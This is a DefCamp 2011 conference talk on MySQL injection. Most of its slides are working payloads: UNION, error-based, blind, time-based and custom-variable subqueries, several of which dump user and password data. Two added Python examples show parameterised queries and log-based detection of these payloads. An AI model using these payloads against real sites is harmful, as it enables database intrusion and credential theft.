DEFCAMP – 2011 “Advanced Data Mining in MySQL Injections using Subqueries & Custom Variables”
Advanced Data Mining in MySQL Injections using Subqueries & Custom Variables
_______________________________________________________________________

- CONTENTS -
[ * ] Introductory notions: SQL, SQL injections
[ * ] Custom variables and subqueries in MySQL
[ * ] Optimising the classic information-extraction techniques:
  - MySQL variables (Server System Variables / Session Variables)
  - available databases (schema_name / SCHEMATA)
  - tables and their columns (table_name / column_name)
  - privileges (USER_PRIVILEGES: GRANTEE/PRIVILEGE_TYPE/IS_GRANTABLE)
  - reading & writing files (LOAD_FILE / INTO DUMPFILE - OUTFILE)
  - Denial of Service (DOS) attacks

Structured Query Language (SQL) is the standard language used to manipulate and retrieve data in relational databases. With SQL, a programmer or a database administrator can:
* modify the structure of a database;
* change the configuration values for system security;
* grant users rights on databases or tables;
* query a database for information;
* update the contents of a database.

How does PHP + MySQL work?
- the request made by the client
- processing of the request on the server
- the response sent back to the client as the result of the request

What could possibly go wrong?!

SQL Injections – a technique for malforming SQL syntax by modifying the values of the $_GET, $_POST, cookie and header parameters, which the server-side files take over and process without first filtering characters or commands that can be dangerous.

Example of a classic MySQL injection.
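The pattern this slide illustrates, shown as an added example that is not part of the DefCamp deck: a Python script that uses an in-memory SQLite database as a stand-in for the PHP + MySQL pair the slides describe (an assumption; the lesson, string-built SQL versus bound parameters, is the same on both engines). The news table, the fetch_* function names and the request values are all constructed for this demo.

```python
"""The classic injection from the slides, vulnerable form beside the fix.

Added example, not from the DefCamp 2011 deck. Uses Python with an in-memory
SQLite database as a stand-in for PHP + MySQL (assumption: the behaviour of
string-built SQL versus bound parameters is the same on both engines).
The table contents below are constructed.
"""
import sqlite3


def make_db() -> sqlite3.Connection:
    """Constructed sample table: two published rows and one unpublished draft."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE news (id INTEGER PRIMARY KEY, title TEXT, published INTEGER)")
    conn.executemany("INSERT INTO news VALUES (?, ?, ?)", [
        (1, "Public notice", 1),
        (2, "Conference schedule", 1),
        (3, "Draft: unreleased announcement", 0),
    ])
    return conn


def fetch_vulnerable(conn: sqlite3.Connection, raw_id: str) -> list:
    """Mirrors the PHP pattern the slides attack: $_GET['id'] pasted into the query text.

    A value such as "2 OR 1=1" rewrites the WHERE clause, so the
    published = 1 restriction no longer applies and the draft row leaks.
    """
    sql = f"SELECT id, title FROM news WHERE published = 1 AND id = {raw_id}"
    return conn.execute(sql).fetchall()


def fetch_parameterised(conn: sqlite3.Connection, raw_id) -> list:
    """Bound parameter: the value is data and can never change the statement's structure."""
    return conn.execute(
        "SELECT id, title FROM news WHERE published = 1 AND id = ?", (raw_id,)
    ).fetchall()


def fetch_hardened(conn: sqlite3.Connection, raw_id: str) -> list:
    """Defence in depth: validate the type the application expects, then bind.

    Rejecting anything that is not a plain integer gives a clean error to
    log instead of a silent empty result set.
    """
    if not raw_id.isdigit():
        raise ValueError("id must be a positive integer")
    return fetch_parameterised(conn, int(raw_id))


if __name__ == "__main__":
    db = make_db()
    for value in ("2", "2 OR 1=1"):
        print(f"id={value!r:12} vulnerable -> {fetch_vulnerable(db, value)}")
        print(f"id={value!r:12} bound      -> {fetch_parameterised(db, value)}")
```

With "2 OR 1=1" the string-built query returns all three rows, draft included; the bound query returns nothing because the whole string is compared as one value against the integer column, and the hardened variant refuses the input before it reaches the database.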

SQL injection types: UNION BASED
index.php?id=1' and 2=4 UNION SELECT 1,2,3,4,5,6,7,8,9,10 --
index.php?poze=vedete"+and+false+union+all+select+1,2,version(),4,5,6+and+"1"="1
index.php?id=-1+UNION+SELECT+1,convert(@@version using latin1),3,4,5--
index.php?id=-1/*!AND*/1=1+UNiOn+ALl+SelECt+1,/**/2,/**/3,/**/4/**/limit/**/1,2
index.php?id=1+and+1=0+union+select+sql_no_cache+1,2,3,4,5

SQL injection types: UNION BASED

SQL injection types: ERROR BASED
index.php?id=(@:=1)||@+group+by+concat(@@version,!@)having@||min(@:=0)--+
Index.php?id=53+OR+(SELECT+COUNT(*)+FROM+(SELECT+1+UNION+SELECT+2+UNION+SELECT+3)x+GROUP+BY+CONCAT(MID((select+concat_ws(0x3a,version(),database(),user())),1,63),+FLOOR(RAND(0)*2)))+--+
news.php?id=589'+or+1+group+by+concat((select+version()),floor(rand(0)*2))+having+min(0)+or+1--+
details.php?ID=9 or (select count(*) from mysql.user group by concat(version(),floor(rand(0)*2)))--
?productid=1124+and+row(1,2)in(select+count(*),concat((select+table_name+from+information_schema.tables+limit+3,1),0x3a,floor(rand(0)*2))as+a+from+information_schema.tables+x+group+by+a)--

SQL injection types: ERROR BASED

SQL injection types: BLIND
index.php?id=1' and substring(@@version,1,1)=4--
index.php?id=1' and substring(@@version,1,1)=5--
index.php?id=1 and (SELECT 1 from admin limit 0,1)=1
news.php?id=-1 'OR id = IF(ASCII(SUBSTRING (SELECT USER ()), 1, 1 )))>= 100, 1, SLEEP (3))
index.html?mdl=5020+and+ascii(lower(substring((select+table_name+from+information_schema.tables+limit+17,1),1,1 )))>1
index.php?id=1 and ascii(substring((SELECT concat(username,0x3a,password) from users where userid=2),1,1))>103
script.php?par=1 and IF(ASCII(SUBSTRING((SELECT USER()),1,1)))>=100,1, BENCHMARK(2000000,MD5(NOW()))) --
script.php?par=1 and IF(ASCII(SUBSTRING((SELECT USER()), 1, 1)))>=100, 1, SLEEP(3)) --

SQL injection types: BLIND

MySQL Custom Variables (user-defined variables)

MySQL Sub-Queries (subqueries)
SELECT * FROM t1 WHERE column1 = (SELECT column1 FROM t2);

MySQL injections using Custom Variables:
CLASSIC SYNTAX:
index.php?id=2'+and+1=0+union+select+1,2,3,4,5--
NEW SYNTAX:
index.php?id=2'+and+1=0+union+select+@i:=version(),@i,@i,@i,@i--
@i:=concat( version(),0x3a,database() )
@i:=cast(version()+as+binary)
@i:=convert(version(),binary)
@i:=convert(version()+using+latin1)
@i:=aes_decrypt(aes_encrypt(version(),1),1)
@x:=concat(0x3c62723e,table_schema,0x2e,table_name,0x3a,column_name)

MySQL injections using Subqueries:
index.php?id=-1+union+select+*+from+users,(select+1,2,3,4,5,6)a--
index.php?id=-1+union+(select 1,2,3,4,5 order by 1 where 1=2) UNION (select1,2,3,4,5)--+--X
id=3 AND (SELECT 7574 FROM(SELECT COUNT(*),CONCAT(CHAR(58,103,104,115,58),(SELECT (CASE WHEN (7574=7574) THEN 1 ELSE 0 END)),CHAR(58,101,118,118,58),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)

MySQL injections using Subqueries + Custom Variables:
index.php?id=-4 union select 1,2,(select(@x) from(select(@x:=0x00),(select (null) from (information_schema.columns) where (table_schema!='information_schema') and (0x00) in (@x:=concat(@x,0x3c62723e,table_schema,0x2e,table_name,0x3a,column_name))))x),4--
index.php?id=-1 Union select 1,2, concat(@i:=0x00,@o:=0x0d0a, benchmark(150, @o:=CONCAT(@o,0x0d0a,(SELECT+concat(@i:=mail,0x3a,password)+from+customers+WHERE+mail > @i+order+by+mail+LIMIT+1+))),o),4
index.php?id=-7' union (select * from (select @i:=version())q join (select@i)w join (select@i)e join (select @i)r join (select @i)t join (select @i)y join (select @i)u join (select @i)i join (select @i)o)--+--qwertyxxxxxxxx

MySQL injections using Subqueries + Custom Variables:
index.php?id=2'+and+1=0+union+select+1,2,3,4,concat(@i:=0x00,@o:=0xd0a,benchmark(1010370,@o:=CONCAT(@o,0xd0a,(SELECT+concat(0x3c62723e,@i:=user_login)+FROM+wp_users+WHERE+user_login>@i+order+by+user_login+LIMIT+1))),@o),6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23+from+information_schema.tables--
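The payload shapes on the UNION, ERROR BASED, BLIND and custom-variable slides, seen from the log-monitoring side, as an added example that is not part of the DefCamp deck: a Python scanner that normalises query strings the way MySQL would read them (URL decoding, /*!...*/ and /**/ comment handling, case folding) and labels each request by injection type. The access-log lines, the signature names, the TEST-NET addresses and the LOG_RE format are all constructed for this demo, and the signatures are a heuristic for triage, not a complete filter.

```python
"""Log-side detection of the MySQL injection shapes catalogued in the slides.

Added example, not part of the DefCamp 2011 deck. The access-log lines below
are constructed (Apache common log format); their query strings follow the
shapes shown on the slides: URL-encoded '+' and %xx, /**/ and /*!...*/
comment spacers, mixed-case keywords, user-variable assignment (@i:=),
FLOOR(RAND(0)*2) error-based probes and SLEEP()/BENCHMARK() time-based probes.
"""
import re
from urllib.parse import unquote_plus

# Apache common log format: %h %l %u %t "%r" %>s %b
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) HTTP/[\d.]+" (?P<status>\d{3}) (?:\d+|-)$'
)

# Signatures are applied to the NORMALISED query string, in this order.
SIGNATURES = [
    ("union-based",   re.compile(r"\bunion\b(?:\s+all)?\s*\(?\s*select\b")),
    ("error-based",   re.compile(r"floor\s*\(\s*rand\s*\(\s*0\s*\)\s*\*\s*2\s*\)|group\s+by\s+concat\s*\(")),
    ("time-based",    re.compile(r"\b(?:sleep|benchmark)\s*\(")),
    ("boolean-blind", re.compile(r"\b(?:substring|substr|mid|ascii)\s*\(.*?(?:>=|<=|=|>|<)\s*\d")),
    ("user-variable", re.compile(r"@[a-z0-9_]*\s*:=")),
    ("fingerprint",   re.compile(r"\binformation_schema\.|\bmysql\.user\b|@@version|\b(?:version|user|database)\s*\(")),
]


def normalise(query: str) -> str:
    """Undo the encoding and spacing tricks from the slides before matching.

    Decode first (so %2F%2A%2A%2F turns back into /**/), then resolve comments
    the way MySQL does (/*!AND*/ executes as AND, /**/ is just whitespace),
    then lower-case and collapse whitespace.
    """
    text = unquote_plus(unquote_plus(query))  # '+' and %xx; one level of double encoding tolerated
    text = re.sub(r"/\*!\d*(.*?)\*/", r" \1 ", text, flags=re.DOTALL)  # version comment: keep executed body
    text = re.sub(r"/\*.*?\*/", " ", text, flags=re.DOTALL)            # plain comment used as a spacer
    return re.sub(r"\s+", " ", text).strip().lower()


def classify(query: str) -> list:
    """Return the signature labels that fire on one raw query string."""
    norm = normalise(query)
    return [label for label, rx in SIGNATURES if rx.search(norm)]


def scan_log(lines: list) -> list:
    """Parse access-log lines and report every request whose query string matches."""
    findings = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m or "?" not in m.group("path"):
            continue  # malformed line or no query string to inspect
        script, query = m.group("path").split("?", 1)
        labels = classify(query)
        if labels:
            findings.append({"ip": m.group("ip"), "script": script,
                             "status": int(m.group("status")), "labels": labels})
    return findings


# Constructed sample log (TEST-NET addresses); query strings follow the slide payload shapes.
SAMPLE_LOG = [
    '203.0.113.7 - - [12/Nov/2011:10:14:03 +0200] "GET /index.php?id=2 HTTP/1.1" 200 5120',
    '203.0.113.7 - - [12/Nov/2011:10:14:09 +0200] "GET /index.php?id=-1/*!AND*/1=1+UNiOn+ALl+SelECt+1,/**/2,/**/3,/**/4/**/limit/**/1,2 HTTP/1.1" 200 4877',
    '203.0.113.7 - - [12/Nov/2011:10:14:15 +0200] "GET /news.php?id=589\'+or+1+group+by+concat((select+version()),floor(rand(0)*2))+having+min(0)+or+1-- HTTP/1.1" 500 612',
    '203.0.113.7 - - [12/Nov/2011:10:14:21 +0200] "GET /index.php?id=2\'+and+1=0+union+select+@i:=version(),@i,@i,@i,@i-- HTTP/1.1" 200 4901',
    '203.0.113.7 - - [12/Nov/2011:10:14:30 +0200] "GET /script.php?par=1+and+IF(ASCII(SUBSTRING((SELECT+USER()),1,1))>=100,1,SLEEP(3))-- HTTP/1.1" 200 3310',
    '203.0.113.7 - - [12/Nov/2011:10:14:36 +0200] "GET /index.php?id=1%27%20and%20substring(%40%40version,1,1)%3D5-- HTTP/1.1" 200 5120',
    '203.0.113.7 - - [12/Nov/2011:10:14:41 +0200] "GET /index.html?mdl=5020+and+ascii(lower(substring((select+table_name+from+information_schema.tables+limit+17,1),1,1)))>1 HTTP/1.1" 200 2208',
    '198.51.100.4 - - [12/Nov/2011:10:15:02 +0200] "GET /static/logo.png HTTP/1.1" 200 8891',
    'this line is not in common log format',
]

if __name__ == "__main__":
    for f in scan_log(SAMPLE_LOG):
        print(f"{f['ip']} {f['script']} status={f['status']} -> {', '.join(f['labels'])}")
```

Normalising before matching is what defeats the evasions the UNION slide shows (UNiOn+ALl+SelECt, /**/ spacers, /*!AND*/); a raw substring match on "union select" misses all of them. Correlating the error-based label with 5xx responses, as with the 500 on the news.php line, is a cheap second signal, since that technique works precisely by forcing a duplicate-key error.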

Editor's Notes

  1. 127.0.0.1/defcamp/0_o/index.php?id=2'+and+1=0+union+select+1,2,3,4,concat(@i:=0x00,@o:=0xd0a,benchmark(1010370,@o:=CONCAT(@o,0xd0a,(SELECT+concat(0x3c62723e,@i:=user_login)+FROM+wp_users+WHERE+user_login>@i+order+by+user_login+LIMIT+1))),@o),6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23+from+information_schema.tables--